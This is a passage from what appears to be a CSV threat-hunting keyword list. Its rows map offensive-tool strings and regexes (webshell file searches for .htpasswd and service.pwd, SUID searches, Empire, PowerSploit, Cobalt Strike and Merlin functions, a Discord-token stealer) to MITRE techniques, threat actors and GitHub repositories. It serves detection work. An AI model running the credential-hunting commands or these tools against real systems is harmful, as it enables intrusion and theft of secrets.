TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44991" "*find / -type f -name .fetchmailrc*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44992" "*find / -type f -name .htpasswd*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44994" "*find / -type f -name .htpasswd*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44995" "*find / -type f -name config.inc.php*",".{0,1000}find\s\/\s\-type\sf\s\-name\sconfig\.inc\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44997" "*find / -type f -name 
config.inc.php*",".{0,1000}find\s\/\s\-type\sf\s\-name\sconfig\.inc\.php.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44998" "*find / -type f -name service.pwd*",".{0,1000}find\s\/\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45000" "*find / -type f -name service.pwd*",".{0,1000}find\s\/\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45001" "*find / -type f -perm -02000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45003" "*find / -type f -perm -02000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find 
commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45004" "*find / -type f -perm -04000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45006" "*find / -type f -perm -04000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45007" "*find /tmp/ -executable -type f 2>/dev/null*",".{0,1000}find\s\/tmp\/\s\-executable\s\-type\sf\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","45013" "*find /var/tmp -executable -type f 2>/dev/null*",".{0,1000}find\s\/var\/tmp\s\-executable\s\-type\sf\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","45015" "*find* -perm -4000 *",".{0,1000}find.{0,1000}\s\-perm\s\-4000\s.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","45016" "*find_and_load_coerce_methods*",".{0,1000}find_and_load_coerce_methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","45017" "*find_domain.sh *",".{0,1000}find_domain\.sh\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","#linux","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","45018" "*find_payload(*",".{0,1000}find_payload\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45019" "*Find-4624Logons*",".{0,1000}Find\-4624Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45020" "*Find-4648Logons*",".{0,1000}Find\-4648Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45021" "*Find-ADInterestingACL *",".{0,1000}Find\-ADInterestingACL\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","45022" 
"*Find-ADInterestingACL.ps1*",".{0,1000}Find\-ADInterestingACL\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","45023" "*FindAdminAccessComputers*",".{0,1000}FindAdminAccessComputers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","45024" "*Find-AdminLogonScripts.ps1*",".{0,1000}Find\-AdminLogonScripts\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45025" "*findall(r""dQw4w9WgXcQ*",".{0,1000}findall\(r\""dQw4w9WgXcQ.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","45026" 
"*find-allvulns*",".{0,1000}find\-allvulns.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45027" "*Find-AmsiAstSignatures *",".{0,1000}Find\-AmsiAstSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","45028" "*Find-AmsiPSTokenSignatures *",".{0,1000}Find\-AmsiPSTokenSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","45029" "*Find-AmsiSignatures.ps1*",".{0,1000}Find\-AmsiSignatures\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","45030" 
"*Find-AppLockerLogs*",".{0,1000}Find\-AppLockerLogs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45031" "*FindAvailablePort.exe*",".{0,1000}FindAvailablePort\.exe.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but 
With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","1","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","45032" "*Find-AVSignature*",".{0,1000}Find\-AVSignature.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45033" "*Find-BadPrivilege.json*",".{0,1000}Find\-BadPrivilege\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45034" "*Find-BadPrivileges-DomainComputers.ps1*",".{0,1000}Find\-BadPrivileges\-DomainComputers\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a 
post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45035" "*Find-ComputersWithRemoteAccessPolicies.json*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45036" "*Find-ComputersWithRemoteAccessPolicies.ps1*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45037" "*Find-DangerousACLPermissions*",".{0,1000}Find\-DangerousACLPermissions.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45038" "*findDelegation.py -dc-ip *",".{0,1000}findDelegation\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 
- T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45040" "*findDelegation.py*",".{0,1000}findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45041" "*Find-DLLHijack*",".{0,1000}Find\-DLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45042" "*Find-DomainShare -*",".{0,1000}Find\-DomainShare\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45043" "*Find-DomainShare -CheckShareAccess*",".{0,1000}Find\-DomainShare\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
